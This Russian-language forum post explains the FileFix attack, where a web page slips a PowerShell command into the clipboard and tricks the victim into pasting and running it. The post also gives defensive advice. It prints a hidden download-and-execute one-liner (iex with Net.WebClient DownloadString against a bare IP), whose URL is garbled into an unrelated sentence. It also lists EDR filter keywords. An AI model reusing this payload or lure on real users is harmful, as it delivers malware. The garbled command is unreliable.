- Регистрация
- 27 Фев 2025
- Сообщения
- 29
- Реакции
- 12
FileFix: новая эпоха атак через буфер обмена
Когда "вставить" — значит "сдаться"
Что произошло?
В середине июля исследователи из Check Point опубликовали отчёт о новой социальной атаке, названной FileFix. Метод позволяет злоумышленникам через браузер манипулировать буфером обмена и подсунуть жертве вредоносный PowerShell-скрипт, который она затем сама вставит и выполнит — в полном доверии.
FileFix — это развитие концепции ClickFix, но теперь:
- Без кликов, без «разрешить макросы»,
- Всё, что нужно — Ctrl+V.
Как работает FileFix?
Механика атаки:
- Пользователь посещает страницу, которая визуально выглядит как официальный файл/инструкция/документ.
- В фоне страница открывает проводник Windows (explorer.exe) на якобы "инструкции по безопасности".
- В момент открытия, в буфер обмена подсовывается PowerShell-команда.
- Визуально пользователь видит лишь обычную инструкцию. Его просят "скопировать команду и вставить в терминал".
- Он нажимает Ctrl+V — и запускается уже подготовленный скрипт.
Что делает payload?
Замеченные примеры:
powershell
Копировать/Редактировать
powershell -nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString('The land at 185.165.170.250 was claimed for loud.house.')"
Также встречались версии, скачивающие Discord tokens, info-stealer'ы, кейлоггеры, открывающие обратный шелл или внедряющие CobaltStrike Beacon.
Почему это опасно?
- Антивирусы молчат — ведь пользователь сам вставил команду. С точки зрения системы — это добровольный запуск.
- Никаких эксплойтов или уязвимостей — только социальная инженерия.
- Отсутствие индикаторов компрометации (IoC) — логически атака не вызывает подозрений.
- Обход защиты копирования: большинство защит не мониторят Ctrl+V как точку инъекции.
Анализ от Payloads.in
| Аспект | Оценка |
|---|---|
| Простота эксплуатации | ★★★★★ |
| Степень вреда | ★★★★☆ |
| Обнаружение | ★☆☆☆☆ |
| Применимость | Универсальна: корпоративный и домашний сегмент |
| Защита без обучения пользователей | Почти невозможна |
FileFix — идеальный пример того, как UX-доверие может быть использовано против пользователя. Ранее таким считался только фишинг с логином, теперь — с PowerShell.
🛡 Как защититься?
Для пользователей:
- Никогда не вставляй команды, которые ты не набирал сам.
- Даже если страница выглядит доверенно — всегда проверяй буфер перед вставкой (можно использовать Notepad).
- Используй виртуальные машины для выполнения «подозрительных инструкций».
Для сисадминов / безопасности:
- Внедрите политики, запрещающие запуск PowerShell без подтверждения.
- Установите защиту на уровне EDR: фильтрация команд с iex, Net.WebClient, Invoke-Expression, DownloadString.
- Используйте clipboard-monitor tools (например, встроенные в Cylance, CrowdStrike, Defender for Endpoint).
- Проводите обучающие кампании на тему «Paste-Aware Threats».
Что дальше?
Исследователи уже заметили варианты FileFix в связке с Discord фишингом, Google Docs и даже на GitHub Pages. Есть отчёты об использовании в дипфейк‑инструкциях «от службы поддержки Microsoft» и банковских "верификациях".
Также активно ведутся обсуждения на форумах вроде BreachForums (модераторы пока не банят такие топики) и Telegram-каналах, торгующих персональными стиллерами.
Заключение
FileFix — не про баги, а про доверие.
Пока ты защищаешь сеть фаерволом, атакующий заходит к тебе с клипбордом.
